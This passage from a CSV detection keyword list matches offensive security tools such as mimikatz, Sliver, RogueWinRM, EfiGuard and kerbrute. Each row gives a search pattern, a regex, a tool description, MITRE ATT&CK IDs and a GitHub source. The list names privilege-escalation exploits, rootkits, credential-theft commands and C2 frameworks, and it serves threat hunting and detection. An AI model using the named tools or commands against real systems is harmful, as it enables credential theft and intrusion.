security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*RogueWinRM.cpp*",".{0,1000}RogueWinRM\.cpp.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*RogueWinRM.exe*",".{0,1000}RogueWinRM\.exe.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*RogueWinRM.zip*",".{0,1000}RogueWinRM\.zip.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" 
"*Rolix44/Kubestroyer*",".{0,1000}Rolix44\/Kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*roodkcaBdrauGifE*",".{0,1000}roodkcaBdrauGifE.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*rookuu/BOFs/*",".{0,1000}rookuu\/BOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*Root backdoor obtained!*",".{0,1000}Root\sbackdoor\sobtained!.{0,1000}","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","0","N/A","N/A","1","22","7","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z" "*root cargo new --bin legba*",".{0,1000}root\scargo\snew\s\-\-bin\slegba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*root\cimv2:Win32_Implant*",".{0,1000}root\\cimv2\:Win32_Implant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*root_userpass.txt*",".{0,1000}root_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*rootcathacking/catspin*",".{0,1000}rootcathacking\/catspin.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*Rootkit is already installed*",".{0,1000}Rootkit\sis\salready\sinstalled.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Rootkit.cpp*",".{0,1000}Rootkit\.cpp.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*root-shellcode-linux*",".{0,1000}root\-shellcode\-linux.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*rop.find_gadgets*",".{0,1000}rop\.find_gadgets.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*RopChain.py*",".{0,1000}RopChain\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and 
constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*ROPEngine.cpp*",".{0,1000}ROPEngine\.cpp.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropfuscator *",".{0,1000}ropfuscator\s.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ROPfuscator*",".{0,1000}ROPfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropfuscator-*",".{0,1000}ropfuscator\-.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" 
"*ropfuscator.*",".{0,1000}ropfuscator\..{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropnop/go-windapsearch*",".{0,1000}ropnop\/go\-windapsearch.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ropnop/kerbrute*",".{0,1000}ropnop\/kerbrute.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*rottenpotato.x64.dll*",".{0,1000}rottenpotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*rottenpotato.x86.dll*",".{0,1000}rottenpotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*RottenPotatoVulnerable.txt*",".{0,1000}RottenPotatoVulnerable\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*routerpasswords.com/*",".{0,1000}routerpasswords\.com\/.{0,1000}","offensive_tool_keyword","routerpasswords.com","find default routers passwords","T1110.003 - T1200","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","1","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*routers_userpass.txt*",".{0,1000}routers_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*routersploit*",".{0,1000}routersploit.{0,1000}","offensive_tool_keyword","routersploit","The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits","T1210.001 - T1190 - T1213 - T1189","TA0007 - TA0002 - TA0001 - TA0011","N/A","N/A","Frameworks","https://github.com/threat9/routersploit","1","1","N/A","N/A","10","11878","2305","2024-04-14T13:58:13Z","2016-03-30T11:43:12Z" "*rpc.Merlin.Exe*",".{0,1000}rpc\.Merlin\.Exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*rpc.Merlin.RunAs*",".{0,1000}rpc\.Merlin\.RunAs.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*rpc://* -rpc-mode ICPR -icpr-ca-name *",".{0,1000}rpc\:\/\/.{0,1000}\s\-rpc\-mode\sICPR\s\-icpr\-ca\-name\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*rpc::close*",".{0,1000}rpc\:\:close.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*rpc::connect*",".{0,1000}rpc\:\:connect.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*rpc::enum*",".{0,1000}rpc\:\:enum.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*rpc::server*",".{0,1000}rpc\:\:server.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*rpcattack.py*",".{0,1000}rpcattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*rpcattack.py*",".{0,1000}rpcattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for 
working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rpc-backdoor.go*",".{0,1000}rpc\-backdoor\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpc-beacons.go*",".{0,1000}rpc\-beacons\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpcdump.py * | grep MS-RPRN*",".{0,1000}rpcdump\.py\s.{0,1000}\s\|\sgrep\sMS\-RPRN.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - 
T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*rpcdump.py*",".{0,1000}rpcdump\.py.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*rpcdump.py*",".{0,1000}rpcdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rpcdump_check*",".{0,1000}rpcdump_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*rpc-hijack.go*",".{0,1000}rpc\-hijack\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - 
T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpc-kill.go*",".{0,1000}rpc\-kill\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpcmap.py*",".{0,1000}rpcmap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rpc-msf.go*",".{0,1000}rpc\-msf\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 